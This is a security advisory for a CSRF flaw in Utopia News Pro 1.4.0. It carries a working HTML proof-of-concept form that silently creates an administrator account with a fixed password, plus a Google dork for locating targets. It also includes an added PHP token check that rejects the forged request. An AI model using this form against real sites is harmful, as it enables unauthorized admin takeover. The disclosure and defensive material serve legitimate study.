Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability

2012.08.22
Credit: Dr.NaNo
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
#                     ~ Exploit ~                      #
########################################################

<html>
<body>
<form action="http://localhost/{PATh}/upload/users.php" method="post" />
<input type="hidden" name="username" value="NANO" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="password" value="102030" />
<input type="hidden" name="password2" value="102030" />
<input type="hidden" name="email" value="security@security.com" />
<input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
</form>
</body>
</html>

#### ~ Greetz ~ ####
#
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng
#
#### ~ All FriendS ~ ####
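
A server-side check that rejects a form like the one above, shown as an added example: it is not part of the original advisory and not Utopia News Pro's own code. The helper names csrf_token() and csrf_check() and the hidden field csrf_token are hypothetical, and $session stands in for $_SESSION so the demo runs from the command line.

```php
<?php
// Added example: synchronizer-token CSRF check for an "add user" POST handler.
// Hypothetical helper and field names; not Utopia News Pro code.

// Issue (or reuse) a per-session token to embed in the form as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept the request only if it is a POST carrying the session's own token.
function csrf_check(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // is_string() guards against array-valued parameters; hash_equals()
    // compares in constant time.
    return is_string($supplied) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Constructed demo data: $session plays the role of the admin's $_SESSION.
$session = [];
$token = csrf_token($session);

// Request as sent by a cross-site form: the advisory's field names, no token.
$forged = [
    'username' => 'NANO', 'groupid' => '1',
    'password' => '102030', 'password2' => '102030',
    'email' => 'security@security.com', 'submitnew' => 'ThankS !',
];
// Same fields submitted from the application's own page, which embeds the token.
$legit = $forged + ['csrf_token' => $token];

foreach (['forged' => $forged, 'legit' => $legit] as $label => $post) {
    $ok = csrf_check($session, 'POST', $post);
    printf("%-6s request: %s\n", $label, $ok ? 'accepted' : 'rejected');
}
```

In a real handler the check runs after session_start() with $_SESSION, $_SERVER['REQUEST_METHOD'] and $_POST, before any account is created.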

References:

http://xforce.iss.net/xforce/xfdb/74760
http://www.exploit-db.com/exploits/18720
http://osvdb.org/80986

